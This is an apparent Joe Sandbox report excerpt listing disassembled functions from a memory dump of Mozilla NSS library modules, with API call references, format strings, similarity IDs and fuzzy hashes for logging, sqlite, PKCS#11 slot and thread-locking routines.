Part of subcall function 6D6109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D610CEC
Part of subcall function 6D6109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610CFB
Part of subcall function 6D6109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D610D16
Part of subcall function 6D6109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6D610D26
Part of subcall function 6D6109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610D35
Part of subcall function 6D6109D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6D610D65
Part of subcall function 6D6109D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6D610D70
Part of subcall function 6D6109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D610D90
Part of subcall function 6D6109D0: free.MOZGLUE(00000000), ref: 6D610D99

PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6D532D3B

Part of subcall function 6D6109D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6D610BAB
Part of subcall function 6D6109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610BBA
Part of subcall function 6D6109D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6D610D7E

PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6D532D54

Part of subcall function 6D6109D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6D610BCB
Part of subcall function 6D6109D0: EnterCriticalSection.KERNEL32(?), ref: 6D610BDE
Part of subcall function 6D6109D0: OutputDebugStringA.KERNEL32(?), ref: 6D610C16

Strings

C_InitToken, xrefs: 6D532CE7
pPin = 0x%p, xrefs: 6D532D1D
ulPinLen = %d, xrefs: 6D532D36
slotID = 0x%x, xrefs: 6D532D02
nam, xrefs: 6D532D6C, 6D532D9A
pLabel = 0x%p, xrefs: 6D532D4F

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken$nam
API String ID: 420000887-1823937797
Opcode ID: 9253a605c9bdfcaf09fff0487dfb5dd0e151082a9eeac47a5f291dc80c3771a2
Instruction ID: b868d60ecb271d6d9fc9b960d2b8202b6e390d0c73327cf6ff3b8d866338e62d
Opcode Fuzzy Hash: 9253a605c9bdfcaf09fff0487dfb5dd0e151082a9eeac47a5f291dc80c3771a2
Instruction Fuzzy Hash: 23213735008050EFDB24DF5ADC44F257BB5EB8A359F068824F70897122EB308C1ACBE2

Function 6D5D2D40 Relevance: 18.2, APIs: 12, Instructions: 187COMMON

Download Yara Rule

APIs

sqlite3_initialize.NSS3 ref: 6D5D2D9F

Part of subcall function 6D48CA30: EnterCriticalSection.KERNEL32(?,?,?,6D4EF9C9,?,6D4EF4DA,6D4EF9C9,?,?,6D4B369A), ref: 6D48CA7A
Part of subcall function 6D48CA30: LeaveCriticalSection.KERNEL32(?), ref: 6D48CB26

sqlite3_exec.NSS3(?,?,6D5D2F70,?,?), ref: 6D5D2DF9
sqlite3_free.NSS3(00000000), ref: 6D5D2E2C
sqlite3_free.NSS3(?), ref: 6D5D2E3A
sqlite3_free.NSS3(?), ref: 6D5D2E52
sqlite3_mprintf.NSS3(6D63AAF9,?), ref: 6D5D2E62
sqlite3_free.NSS3(?), ref: 6D5D2E70
sqlite3_free.NSS3(?), ref: 6D5D2E89
sqlite3_free.NSS3(?), ref: 6D5D2EBB
sqlite3_free.NSS3(?), ref: 6D5D2ECB
sqlite3_free.NSS3(00000000), ref: 6D5D2F3E
sqlite3_free.NSS3(?), ref: 6D5D2F4C

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: sqlite3_free$CriticalSection$EnterLeavesqlite3_execsqlite3_initializesqlite3_mprintf
String ID:
API String ID: 1957633107-0
Opcode ID: 51e91bbfe2677309cc91af7235699c2c760626534b14c40a4f082a26c0ca29fc
Instruction ID: 372be36d07bcc5d6043da97f96d83ca654d3622fe612b23b381089e0c6880565
Opcode Fuzzy Hash: 51e91bbfe2677309cc91af7235699c2c760626534b14c40a4f082a26c0ca29fc
Instruction Fuzzy Hash: 74617EB5E042068FEB54CFA8D881BAEB7B1EF88348F054428DD15A7741E731E941CBB5

Function 6D517C70 Relevance: 18.1, APIs: 12, Instructions: 141COMMON

Download Yara Rule

APIs

PR_CallOnce.NSS3(6D662120,6D517E60,?,?,?,?,?,6D5951DF,6D595990,00000000), ref: 6D517C81

Part of subcall function 6D484C70: TlsGetValue.KERNEL32(?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484C97
Part of subcall function 6D484C70: EnterCriticalSection.KERNEL32(?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CB0
Part of subcall function 6D484C70: PR_Unlock.NSS3(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CC9

TlsGetValue.KERNEL32 ref: 6D517CA0
EnterCriticalSection.KERNEL32(?), ref: 6D517CB4
PR_Unlock.NSS3 ref: 6D517CCF

Part of subcall function 6D5ADD70: TlsGetValue.KERNEL32 ref: 6D5ADD8C
Part of subcall function 6D5ADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6D5ADDB4

TlsGetValue.KERNEL32 ref: 6D517D04
EnterCriticalSection.KERNEL32(?), ref: 6D517D1B
realloc.MOZGLUE(-00000050), ref: 6D517D82
PR_SetError.NSS3(FFFFE005,00000000), ref: 6D517DF4
PR_Unlock.NSS3 ref: 6D517E0E

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CriticalSectionValue$EnterUnlock$CallErrorLeaveOncerealloc
String ID:
API String ID: 2305085145-0
Opcode ID: d4a77cbf49b314465a5db8b204691bd3d643df849f116be1d62773f280c62a81
Instruction ID: ba028ad321c285ea5cd18c20c602da18d3c34324794139ef01130d8f39f4c364
Opcode Fuzzy Hash: d4a77cbf49b314465a5db8b204691bd3d643df849f116be1d62773f280c62a81
Instruction Fuzzy Hash: 3251F475C0C105DBEF199F2DCC41B35B7B5FB46314F16492AEE0587662EB309894CA82

Function 6D484C70 Relevance: 18.1, APIs: 12, Instructions: 116threadCOMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484C97
EnterCriticalSection.KERNEL32(?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CB0
PR_Unlock.NSS3(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CC9
TlsGetValue.KERNEL32(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484D11
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484D2A
PR_NotifyAllCondVar.NSS3(?,?,?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484D4A
PR_Unlock.NSS3(?,?,?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484D57
PR_GetCurrentThread.NSS3(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484D97
PR_Lock.NSS3(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484DBA
PR_WaitCondVar.NSS3 ref: 6D484DD4
PR_Unlock.NSS3(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484DE6
PR_GetCurrentThread.NSS3(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484DEF

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
String ID:
API String ID: 3388019835-0
Opcode ID: 543ec114ab9c4733432efa0ec8b85293d768ef3d76e015074eded9758b4fdb1f
Instruction ID: da6fcb440306a7c74c2976a7d2ef209379dc25fd7a4f41c868831ae5908638fa
Opcode Fuzzy Hash: 543ec114ab9c4733432efa0ec8b85293d768ef3d76e015074eded9758b4fdb1f
Instruction Fuzzy Hash: D2417CB5908655CFCB01EF79C484A29B7F8BF49394B168669D988DB311E730EC81CBC2

Function 6D528F70 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 152COMMON

Download Yara Rule

APIs

PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6D528FAF
PR_Now.NSS3(?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6D528FD1
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6D528FFA
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6D529013
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353), ref: 6D529042
TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6D52905A
EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6D529073
PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353), ref: 6D5290EC

Part of subcall function 6D4F0F00: PR_GetPageSize.NSS3(6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F1B
Part of subcall function 6D4F0F00: PR_NewLogModule.NSS3(clock,6D4F0936,FFFFE8AE,?,6D4816B7,00000000,?,6D4F0936,00000000,?,6D48204A), ref: 6D4F0F25

PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6D51DA9B,?,00000000,?,?,?,?,CE534353), ref: 6D529111

Strings

nam, xrefs: 6D5290A3

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Unlock$CriticalEnterSectionValue$InternalK11_ModulePageSizeSlot
String ID: nam
API String ID: 2831689957-4006275851
Opcode ID: 5ab83aed3b840140e9340f3c747fbd27310f508de4edf7e6d4131638541dc293
Instruction ID: 976f8bf43184911215e391db9fa64f37dafc639cb762f71c3dda00d055e517cf
Opcode Fuzzy Hash: 5ab83aed3b840140e9340f3c747fbd27310f508de4edf7e6d4131638541dc293
Instruction Fuzzy Hash: 2B518B759082158FDF08EF7AC484769BBF0BF89314F064969DD459B795EB30E888CB82

Function 6D50E910 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 149memorystringCOMMON

Download Yara Rule

APIs

PL_strncasecmp.NSS3(?,http://,00000007), ref: 6D50E93B
PR_SetError.NSS3(FFFFE075,00000000), ref: 6D50E94E
PORT_Alloc_Util.NSS3(00000001), ref: 6D50E995
memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6D50E9A7
strtol.API-MS-WIN-CRT-CONVERT-L1-1-0(?,00000000,0000000A), ref: 6D50E9CA
PORT_Strdup_Util.NSS3(6D64933E), ref: 6D50EA17
PORT_Alloc_Util.NSS3(00000001), ref: 6D50EA28

Part of subcall function 6D560BE0: malloc.MOZGLUE(6D558D2D,?,00000000,?), ref: 6D560BF8
Part of subcall function 6D560BE0: TlsGetValue.KERNEL32(6D558D2D,?,00000000,?), ref: 6D560C15

memcpy.VCRUNTIME140(00000000,?,00000000), ref: 6D50EA3C
free.MOZGLUE(?), ref: 6D50EA69

Strings

http://, xrefs: 6D50E935

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Util$Alloc_memcpy$ErrorL_strncasecmpStrdup_Valuefreemallocstrtol
String ID: http://
API String ID: 3982757857-1121587658
Opcode ID: 02218a7b0a805f6379d4c58ad97a0187965a7794404284b8ff8976644c1672cf
Instruction ID: dca6057c81f4472bfe6a76e8f3194bd9bf3c84f0e4ca222a8c7927136d4e4715
Opcode Fuzzy Hash: 02218a7b0a805f6379d4c58ad97a0187965a7794404284b8ff8976644c1672cf
Instruction Fuzzy Hash: 1C41A0B4D482074BEF698AAC8C417BB77A5BB4B304F204C26DD95D7B41E3129543C366

Function 6D617CD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 113threadstringCOMMON

Download Yara Rule

APIs

PR_GetCurrentThread.NSS3 ref: 6D617CE0

Part of subcall function 6D5C9BF0: TlsGetValue.KERNEL32(?,?,?,6D610A75), ref: 6D5C9C07

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D617D36
PR_Realloc.NSS3(?,00000080), ref: 6D617D6D
PR_GetCurrentThread.NSS3 ref: 6D617D8B
PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6D617DC2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D617DD8
malloc.MOZGLUE(00000080), ref: 6D617DF8
PR_GetCurrentThread.NSS3 ref: 6D617E06

Strings

:%s:%d:0x%lx, xrefs: 6D617DB9
NSPR_INHERIT_FDS=%s:%d:0x%lx, xrefs: 6D617DF0

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
API String ID: 530461531-3274975309
Opcode ID: d2d3a3b1324a48ad5666f86c9f7ef01585f4a15227f5867fd641c0e782e1785a
Instruction ID: ba17d66348f9666af3b6b058d6e1225acd2b0d663aad73a7be45ae12ba8a966c
Opcode Fuzzy Hash: d2d3a3b1324a48ad5666f86c9f7ef01585f4a15227f5867fd641c0e782e1785a
Instruction Fuzzy Hash: DA41A4B5D08206EFDB08CF2DCC8097A3766FF88358B15856CE9198B251D731E845CBA5

Function 6D524E50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6D524E90
EnterCriticalSection.KERNEL32 ref: 6D524EA9
TlsGetValue.KERNEL32 ref: 6D524EC6
EnterCriticalSection.KERNEL32 ref: 6D524EDF
PL_HashTableLookup.NSS3 ref: 6D524EF8
PR_Unlock.NSS3 ref: 6D524F05
PR_Now.NSS3 ref: 6D524F13
PR_Unlock.NSS3 ref: 6D524F3A

Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07AD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07CD
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6D48204A), ref: 6D4F07D6
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6D48204A), ref: 6D4F07E4
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,6D48204A), ref: 6D4F0864
Part of subcall function 6D4F07A0: calloc.MOZGLUE(00000001,0000002C), ref: 6D4F0880
Part of subcall function 6D4F07A0: TlsSetValue.KERNEL32(00000000,?,?,6D48204A), ref: 6D4F08CB
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08D7
Part of subcall function 6D4F07A0: TlsGetValue.KERNEL32(?,?,6D48204A), ref: 6D4F08FB

Strings

bURm, xrefs: 6D524F3F
bURm, xrefs: 6D524E5C

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: Value$CriticalEnterSectionUnlockcalloc$HashLookupTable
String ID: bURm$bURm
API String ID: 326028414-4260224016
Opcode ID: 56c3aef289af15ce3237f355de43f2f1fb6895e8c56ee8c196ce7a3a94bfd0bc
Instruction ID: 6b22994650e821f3df232df8c8740e119f6b278722624c98bc29328780ab8bc8
Opcode Fuzzy Hash: 56c3aef289af15ce3237f355de43f2f1fb6895e8c56ee8c196ce7a3a94bfd0bc
Instruction Fuzzy Hash: D2414AB49046058FCB04DF69C48496ABBF0FF89314B068969ED999B710EB30E895CBD2

Function 6D54ECE0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6D54DE64), ref: 6D54ED0C
SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6D54ED22

Part of subcall function 6D55B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D6318D0,?), ref: 6D55B095

PL_FreeArenaPool.NSS3(?), ref: 6D54ED4A
PL_FinishArenaPool.NSS3(?), ref: 6D54ED6B
PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D54ED38

Part of subcall function 6D484C70: TlsGetValue.KERNEL32(?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484C97
Part of subcall function 6D484C70: EnterCriticalSection.KERNEL32(?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CB0
Part of subcall function 6D484C70: PR_Unlock.NSS3(?,?,?,?,?,6D483921,6D6614E4,6D5CCC70), ref: 6D484CC9

SECOID_FindOID_Util.NSS3(?), ref: 6D54ED52
PR_CallOnce.NSS3(6D662AA4,6D5612D0), ref: 6D54ED83
PL_FreeArenaPool.NSS3(?), ref: 6D54ED95
PL_FinishArenaPool.NSS3(?), ref: 6D54ED9D

Part of subcall function 6D5664F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6D56127C,00000000,00000000,00000000), ref: 6D56650E

Strings

security, xrefs: 6D54ED06

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
String ID: security
API String ID: 3323615905-3315324353
Opcode ID: 8742b539a5e51c9a62d4941f9a6ecae0feb28113d6936758971be666f8e9dc6b
Instruction ID: 1157cdb8b31a8f76ff972d04392d70b2f1c9c6d6c9d388257381efef978031b8
Opcode Fuzzy Hash: 8742b539a5e51c9a62d4941f9a6ecae0feb28113d6936758971be666f8e9dc6b
Instruction Fuzzy Hash: 68116A719043056BEB18DA25AC80F3B7278AF8674DF06892DF904A3952FB24A90486F3

Function 6D610EB0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 65COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Aborting,?,6D4F2357), ref: 6D610EB8
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(6D4F2357), ref: 6D610EC0
PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6D610EE6

Part of subcall function 6D6109D0: PR_Now.NSS3 ref: 6D610A22
Part of subcall function 6D6109D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6D610A35
Part of subcall function 6D6109D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6D610A66
Part of subcall function 6D6109D0: PR_GetCurrentThread.NSS3 ref: 6D610A70
Part of subcall function 6D6109D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6D610A9D
Part of subcall function 6D6109D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6D610AC8
Part of subcall function 6D6109D0: PR_vsmprintf.NSS3(?,?), ref: 6D610AE8
Part of subcall function 6D6109D0: EnterCriticalSection.KERNEL32(?), ref: 6D610B19
Part of subcall function 6D6109D0: OutputDebugStringA.KERNEL32(00000000), ref: 6D610B48
Part of subcall function 6D6109D0: _PR_MD_UNLOCK.NSS3(?), ref: 6D610C76
Part of subcall function 6D6109D0: PR_LogFlush.NSS3 ref: 6D610C7E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6D610EFA

Part of subcall function 6D4FAEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6D4FAF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D610F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D610F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D610F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D610F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6D610ED9, 6D610EE5, 6D610F06, 6D610F0B
Aborting, xrefs: 6D610EB3

Memory Dump Source

Source File: 0000000E.00000002.3245470365.000000006D481000.00000020.00000001.01000000.0000001C.sdmp, Offset: 6D480000, based on PE: true

Associated: 0000000E.00000002.3245278272.000000006D480000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247311062.000000006D61F000.00000002.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3247819676.000000006D65E000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248022740.000000006D65F000.00000008.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248173444.000000006D660000.00000004.00000001.01000000.0000001C.sdmpDownload File
Associated: 0000000E.00000002.3248328320.000000006D665000.00000002.00000001.01000000.0000001C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_6d480000_232a1df2aa.jbxd

Similarity

API ID: DebugPrintR_snprintf__acrt_iob_funcabort$BreakCriticalCurrentEnterExplodeFlushOutputR_vsmprintfR_vsnprintfSectionStringThreadTime__stdio_common_vfprintffflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 3905088656-1374795319
Opcode ID: 1f1889a0d239145c46bb3af81ab34011a7826add02f51127c089eae5df7827e9
